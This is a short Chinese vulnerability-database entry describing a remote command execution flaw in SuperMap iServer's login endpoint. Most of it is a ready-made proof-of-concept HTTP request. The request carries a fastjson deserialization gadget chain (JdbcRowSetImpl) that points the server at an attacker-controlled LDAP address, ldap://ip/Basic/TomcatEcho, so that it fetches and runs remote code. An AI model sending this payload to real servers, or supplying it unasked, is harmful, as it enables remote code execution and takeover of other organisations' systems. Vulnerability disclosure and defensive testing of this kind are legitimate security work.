SuperMap-iServer login 远程命令执行漏洞

日期: 2024-08-28 14:57:40 | 影响软件: SuperMap iServer | POC: 已公开

漏洞描述

反序列化漏洞主要发生在应用程序未对用户输入的序列化字符串进行充分检查的情况下，攻击者可以通过构造恶意的序列化数据来进行攻击，从而控制应用程序的行为，执行任意代码，访问或修改敏感数据，甚至可能导致整个系统的控制权被攻陷。

PoC代码

POST /iserver/services/security/login.json HTTP/1.1
Host: 
Content-Type: application/json

{
"rasdnd1": {
    "@type": "java.lang.Class", 
    "val": "com.sun.rowset.JdbcRowSetImpl"
}, 
"randfd2": {
    "@type": "com.sun.rowset.JdbcRowSetImpl", 
    "dataSourceName": "ldap://ip/Basic/TomcatEcho", 
    "autoCommit": true
}
}

相关漏洞推荐